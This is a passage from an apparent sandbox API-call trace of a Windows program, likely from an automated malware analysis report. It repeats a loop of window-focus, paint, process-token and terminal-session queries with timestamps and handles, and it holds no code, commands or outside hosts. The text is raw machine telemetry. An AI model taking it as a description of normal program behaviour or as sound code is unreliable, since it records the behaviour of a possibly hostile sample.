x=2534, y=6099, lpString="", c=0) returned 1 [0072.468] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.468] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.469] GetTickCount () returned 0x1f344 [0072.469] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.469] SetForegroundWindow (hWnd=0x0) returned 0 [0072.469] BringWindowToTop (hWnd=0x0) returned 0 [0072.469] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x628) returned 1 [0072.469] GetTokenInformation (in: TokenHandle=0x628, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.469] GetLastError () returned 0x7a [0072.469] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.469] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.470] WTSFreeMemory (pMemory=0x0) [0072.470] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.470] TextOutW (hdc=0x0, x=2544, y=6124, lpString="", c=0) returned 1 [0072.470] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.470] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.470] GetTickCount () returned 0x1f344 [0072.470] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.470] SetForegroundWindow (hWnd=0x0) returned 0 [0072.471] BringWindowToTop (hWnd=0x0) returned 0 [0072.471] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x62c) returned 1 [0072.471] GetTokenInformation (in: TokenHandle=0x62c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.471] GetLastError () returned 0x7a [0072.471] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.471] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.471] WTSFreeMemory (pMemory=0x0) [0072.471] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.474] TextOutW (hdc=0x0, x=2554, y=6149, lpString="", c=0) returned 1 [0072.474] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.474] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.474] GetTickCount () returned 0x1f354 [0072.474] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.475] SetForegroundWindow (hWnd=0x0) returned 0 [0072.475] BringWindowToTop (hWnd=0x0) returned 0 [0072.475] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x630) returned 1 [0072.475] GetTokenInformation (in: TokenHandle=0x630, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.475] GetLastError () returned 0x7a [0072.475] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.475] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.475] WTSFreeMemory (pMemory=0x0) [0072.475] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.475] TextOutW (hdc=0x0, x=2564, y=6174, lpString="", c=0) returned 1 [0072.475] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.475] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.475] GetTickCount () returned 0x1f354 [0072.476] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.476] SetForegroundWindow (hWnd=0x0) returned 0 [0072.476] BringWindowToTop (hWnd=0x0) returned 0 [0072.476] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x634) returned 1 [0072.476] GetTokenInformation (in: TokenHandle=0x634, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.476] GetLastError () returned 0x7a [0072.476] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.476] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.477] WTSFreeMemory (pMemory=0x0) [0072.477] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.477] TextOutW (hdc=0x0, x=2574, y=6199, lpString="", c=0) returned 1 [0072.477] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.477] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.477] GetTickCount () returned 0x1f354 [0072.478] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.478] SetForegroundWindow (hWnd=0x0) returned 0 [0072.478] BringWindowToTop (hWnd=0x0) returned 0 [0072.478] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x638) returned 1 [0072.478] GetTokenInformation (in: TokenHandle=0x638, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.478] GetLastError () returned 0x7a [0072.478] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.478] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.478] WTSFreeMemory (pMemory=0x0) [0072.478] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.479] TextOutW (hdc=0x0, x=2584, y=6224, lpString="", c=0) returned 1 [0072.479] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.479] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.479] GetTickCount () returned 0x1f354 [0072.480] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.480] SetForegroundWindow (hWnd=0x0) returned 0 [0072.480] BringWindowToTop (hWnd=0x0) returned 0 [0072.480] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x63c) returned 1 [0072.480] GetTokenInformation (in: TokenHandle=0x63c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.480] GetLastError () returned 0x7a [0072.480] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.480] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.481] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.481] TextOutW (hdc=0x0, x=2594, y=6249, lpString="", c=0) returned 1 [0072.481] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.481] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.481] GetTickCount () returned 0x1f354 [0072.482] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.482] SetForegroundWindow (hWnd=0x0) returned 0 [0072.482] BringWindowToTop (hWnd=0x0) returned 0 [0072.482] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x640) returned 1 [0072.482] GetTokenInformation (in: TokenHandle=0x640, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.482] GetLastError () returned 0x7a [0072.482] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.482] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.482] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.482] TextOutW (hdc=0x0, x=2604, y=6274, lpString="", c=0) returned 1 [0072.482] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.482] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.482] GetTickCount () returned 0x1f354 [0072.483] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.483] SetForegroundWindow (hWnd=0x0) returned 0 [0072.483] BringWindowToTop (hWnd=0x0) returned 0 [0072.483] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x644) returned 1 [0072.483] GetTokenInformation (in: TokenHandle=0x644, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.483] GetLastError () returned 0x7a [0072.483] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.483] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.484] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.484] TextOutW (hdc=0x0, x=2614, y=6299, lpString="", c=0) returned 1 [0072.484] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.484] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.484] GetTickCount () returned 0x1f354 [0072.484] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.484] SetForegroundWindow (hWnd=0x0) returned 0 [0072.484] BringWindowToTop (hWnd=0x0) returned 0 [0072.484] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x648) returned 1 [0072.485] GetTokenInformation (in: TokenHandle=0x648, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.485] GetLastError () returned 0x7a [0072.485] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.485] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.485] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.485] TextOutW (hdc=0x0, x=2624, y=6324, lpString="", c=0) returned 1 [0072.485] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.485] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.485] GetTickCount () returned 0x1f354 [0072.486] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.486] SetForegroundWindow (hWnd=0x0) returned 0 [0072.486] BringWindowToTop (hWnd=0x0) returned 0 [0072.486] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x64c) returned 1 [0072.486] GetTokenInformation (in: TokenHandle=0x64c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.486] GetLastError () returned 0x7a [0072.486] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.486] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.486] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.486] TextOutW (hdc=0x0, x=2634, y=6349, lpString="", c=0) returned 1 [0072.486] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.487] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.487] GetTickCount () returned 0x1f354 [0072.488] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.488] SetForegroundWindow (hWnd=0x0) returned 0 [0072.488] BringWindowToTop (hWnd=0x0) returned 0 [0072.488] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x650) returned 1 [0072.488] GetTokenInformation (in: TokenHandle=0x650, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.488] GetLastError () returned 0x7a [0072.488] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.488] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.488] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.489] TextOutW (hdc=0x0, x=2644, y=6374, lpString="", c=0) returned 1 [0072.489] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.489] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.489] GetTickCount () returned 0x1f363 [0072.490] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.490] SetForegroundWindow (hWnd=0x0) returned 0 [0072.490] BringWindowToTop (hWnd=0x0) returned 0 [0072.490] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x654) returned 1 [0072.490] GetTokenInformation (in: TokenHandle=0x654, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.490] GetLastError () returned 0x7a [0072.490] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.490] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.490] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.490] TextOutW (hdc=0x0, x=2654, y=6399, lpString="", c=0) returned 1 [0072.490] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.490] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.490] GetTickCount () returned 0x1f363 [0072.491] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.491] SetForegroundWindow (hWnd=0x0) returned 0 [0072.491] BringWindowToTop (hWnd=0x0) returned 0 [0072.491] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x658) returned 1 [0072.491] GetTokenInformation (in: TokenHandle=0x658, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.491] GetLastError () returned 0x7a [0072.491] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.491] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.492] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.492] TextOutW (hdc=0x0, x=2664, y=6424, lpString="", c=0) returned 1 [0072.492] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.492] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.492] GetTickCount () returned 0x1f363 [0072.493] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.493] SetForegroundWindow (hWnd=0x0) returned 0 [0072.493] BringWindowToTop (hWnd=0x0) returned 0 [0072.493] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x65c) returned 1 [0072.493] GetTokenInformation (in: TokenHandle=0x65c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.493] GetLastError () returned 0x7a [0072.493] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.493] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.493] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.493] TextOutW (hdc=0x0, x=2674, y=6449, lpString="", c=0) returned 1 [0072.493] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.493] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.493] GetTickCount () returned 0x1f363 [0072.494] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.494] SetForegroundWindow (hWnd=0x0) returned 0 [0072.494] BringWindowToTop (hWnd=0x0) returned 0 [0072.494] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x660) returned 1 [0072.494] GetTokenInformation (in: TokenHandle=0x660, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.494] GetLastError () returned 0x7a [0072.494] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.494] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.495] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.495] TextOutW (hdc=0x0, x=2684, y=6474, lpString="", c=0) returned 1 [0072.495] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.495] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.495] GetTickCount () returned 0x1f363 [0072.497] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.497] SetForegroundWindow (hWnd=0x0) returned 0 [0072.497] BringWindowToTop (hWnd=0x0) returned 0 [0072.497] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x664) returned 1 [0072.497] GetTokenInformation (in: TokenHandle=0x664, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.497] GetLastError () returned 0x7a [0072.497] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.497] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.498] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.498] TextOutW (hdc=0x0, x=2694, y=6499, lpString="", c=0) returned 1 [0072.498] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.498] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.498] GetTickCount () returned 0x1f363 [0072.499] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.499] SetForegroundWindow (hWnd=0x0) returned 0 [0072.499] BringWindowToTop (hWnd=0x0) returned 0 [0072.499] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x668) returned 1 [0072.499] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.499] GetLastError () returned 0x7a [0072.499] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.499] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.499] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.499] TextOutW (hdc=0x0, x=2704, y=6524, lpString="", c=0) returned 1 [0072.500] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.500] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.500] GetTickCount () returned 0x1f363 [0072.500] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.500] SetForegroundWindow (hWnd=0x0) returned 0 [0072.500] BringWindowToTop (hWnd=0x0) returned 0 [0072.500] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x66c) returned 1 [0072.500] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.500] GetLastError () returned 0x7a [0072.500] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.500] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.501] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.501] TextOutW (hdc=0x0, x=2714, y=6549, lpString="", c=0) returned 1 [0072.501] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.501] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.501] GetTickCount () returned 0x1f363 [0072.501] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.501] SetForegroundWindow (hWnd=0x0) returned 0 [0072.501] BringWindowToTop (hWnd=0x0) returned 0 [0072.502] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x670) returned 1 [0072.502] GetTokenInformation (in: TokenHandle=0x670, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.502] GetLastError () returned 0x7a [0072.502] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.502] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.502] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.502] TextOutW (hdc=0x0, x=2724, y=6574, lpString="", c=0) returned 1 [0072.502] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.502] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.502] GetTickCount () returned 0x1f363 [0072.503] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.503] SetForegroundWindow (hWnd=0x0) returned 0 [0072.503] BringWindowToTop (hWnd=0x0) returned 0 [0072.503] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x674) returned 1 [0072.503] GetTokenInformation (in: TokenHandle=0x674, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.503] GetLastError () returned 0x7a [0072.503] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.503] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.504] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.504] TextOutW (hdc=0x0, x=2734, y=6599, lpString="", c=0) returned 1 [0072.504] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.504] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.504] GetTickCount () returned 0x1f373 [0072.504] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.504] SetForegroundWindow (hWnd=0x0) returned 0 [0072.505] BringWindowToTop (hWnd=0x0) returned 0 [0072.505] OpenProcessToken (in: 